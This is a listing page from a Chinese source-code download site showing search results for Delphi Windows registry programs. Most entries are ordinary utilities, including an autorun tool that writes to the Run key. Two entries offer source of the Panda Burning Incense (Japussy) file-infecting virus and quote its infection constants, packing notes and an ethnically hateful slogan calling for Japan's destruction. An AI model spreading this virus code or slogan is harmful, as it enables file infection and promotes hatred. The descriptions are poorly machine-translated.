Welcome![Sign In][Sign Up]
Location:
Search - registry windows delphi

Search list

[OS programvirus

Description: 熊猫烧香原代码 熊猫烧香, 十六进制, Windows, 源代码, 字符串 熊猫烧香源代码 program Japussy uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry} const HeaderSize = 82432 //病毒体的大小 IconOffset = EB8 //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912 //Upx压缩过病毒体的大小 IconOffset = BC //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = E8 //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize //PE文件主图标的尾部 ID = 444444 //感染标记 //垃圾码,以备写入 Catchword = If a race need to be killed out, it must be Yamato. + If a country need to be destroyed, it must be Japan! + *** {$R *.RES} function : Integer): Integer-Panda original code Panda burning incense, hexadecimal, Windows source code, string the panda source code program Japussy uses Windows, the SysUtils the Classes, Graphics, ShellAPI {, Registry} const HeaderSize = 82 432 // virions the the size of IconOffset = EB8 // PE file main icon offset// in the above compile my Delphi5 SP1 size, other versions of Delphi may be different// Find 2800000020 hexadecimal string can be found in the main icon the offset {HeaderSize = 38912 // Upx compression over the the virus body size IconOffset = BC // Upx compressed PE file offset of the main icons the// Upx 1.24W Usage: upx-9- 8086 Japussy. exe} IconSize = E8 // PE file main icon size the- 744 the byte IconTail = IconOffset+ IconSize // tail of the PE file main icon ID = 444 444 // infection markers// junk yard to prepare written Catchword = ' If a race need to be killed out, it must be Yamato.' +' If a country need to be destroyed, it must be Japan! ' +' *** {$ R*. RES} function:
Platform: | Size: 4096 | Author: 炎热 | Hits:

[Windows DevelopRegTool

Description: 注册表浏览器,Delphi源码完整版,有键值定位功能,基本上是仿Windows风格的,有树叉菜单,界面似乎伏做的不错,而且也没用到三方控件,D7的朋友可直接编译。-Registry browser, the full version of the Delphi source key positioning function, basically imitation Windows style, Shucha menu the interface seems volts do well, but also useless to the tripartite controls can be directly compiled D7 friend .
Platform: | Size: 58368 | Author: 爱阳光 | Hits:

[Windows Developregkeysafe

Description: Delphi使用注册表键值保存信息的源码,按要求输入对应数值后,Delphi代码将生成注册表键值,将用户输入的信息保存在注册表中。注册表保存信息是依赖于Windows系统,在编程基于Win平台的应用程序时,这是比较基本的功能。-Delphi uses a registry key to save the source of the information, required to enter the corresponding value, Delphi code will generate a registry key, the user-entered information stored in the registry. Registry to save the information is dependent on the Windows system, in the programming to Win platform-based application, which is a basic function.
Platform: | Size: 7168 | Author: 李群 | Hits:

[Windows Develope

Description: Delphi修改DNS的程序源代码,部分操作需要读取修改windows注册表,在窗体的文本框中输入新的DNS地址,在上述列表中选择网卡硬件,即可修改DNS。 -Delphi source code to modify the DNS, some operations require read-modify windows registry, enter the new DNS address in the form of a text box, select the network adapter hardware in the above list, you can modify the DNS.
Platform: | Size: 12288 | Author: SPPPYUR | Hits:

[Delphi VCLDelphi_161767

Description: Delphi:Delphi编写一个开机后可自动运行的程序,想当于添加到了快速启动项中,实现开机启动的方法有多种,本代码的实现方法是通过添加注册表项的值来实现,修改:HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run下边的值,程序自动创建这个键值,这是一种比较简单好用的方法。 -Delphi: Delphi programming boot automatically after a run, want to adding items to a fast start, to achieve a variety of boot methods, implementation of this code by adding a registry key values ??to achieve, modify: HKEY_LOCAL_MACHINE \ software \ microsoft \ windows \ currentversion \ run lower values??, the program automatically creates this key, which is a relatively simple and easy way.
Platform: | Size: 101376 | Author: EUYZ7KC | Hits:

[Delphi VCLautorundeiphi

Description: Delphi设置程序被自动执行,就是把程序添加到开机启动项里面,程序主要是通过添加或修改注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run键值来实现此功能。这也是大家惯用的添加开机启动的方法。通过程序界面你可以轻松实现这一功能。-Delphi setup is automated, is to add the user to the boot entry, program is mainly the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run key to modify the registry by adding or to achieve this function. Method to add boot which is the usual. Through the program interface, you can easily achieve this function.
Platform: | Size: 5120 | Author: lpudn9 | Hits:

[Delphi VCLlinghuprocess

Description: 灵狐Delphi版windows进程管理器,较系统本身的任务管理器功能更强劲,除了进程的显示和管理功能外,CPU和内存性能占用显示当然不可少了。除此之外还有启动项管理、注册表优化管理、文件及文件夹管理、进程列表快照查看、重启电脑和关闭系统等功能,在此基础上,你可以制作一个windows系统管理软件了。-Ling fox Delphi version of the windows process management, task management function is the system itself more powerful, in addition to the process of display and management functions, CPU and memory performance of course can not be less busy display. Functions in addition to the startup items management, registry optimization management, file and folder management, process list snapshot view, restart the computer and closed system, on the basis of this, you can create a Windows system management software.
Platform: | Size: 537600 | Author: lpudn19 | Hits:

[Delphi VCLDelphi_844468

Description: Delphi:Delphi使用注册表键值保存信息,按要求输入对应数值后,Delphi代码将生成注册表键值,将用户输入的信息保存在注册表中。注册表保存信息是依赖于Windows系统,在编程基于Win平台的应用程序时,这是比较基本的功能。 -Delphi: Delphi using a registry key to save the information required to enter the corresponding values??, Delphi code generation registry key, the information entered by the user is stored in the registry. Registry information is dependent on Windows systems, when programming applications based on Win platform, which is more basic functions.
Platform: | Size: 7168 | Author: WUJROXX | Hits:

[Internet-Network熊猫烧香病毒源代码

Description: 最早熊猫烧香源代码 仅供学习参考 部分样本 一下 uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' +(Microsoft Developer Studio Workspace File, Format Version 6.00)
Platform: | Size: 4096 | Author: 那山小黑 | Hits:
« 1 2»

CodeBus www.codebus.net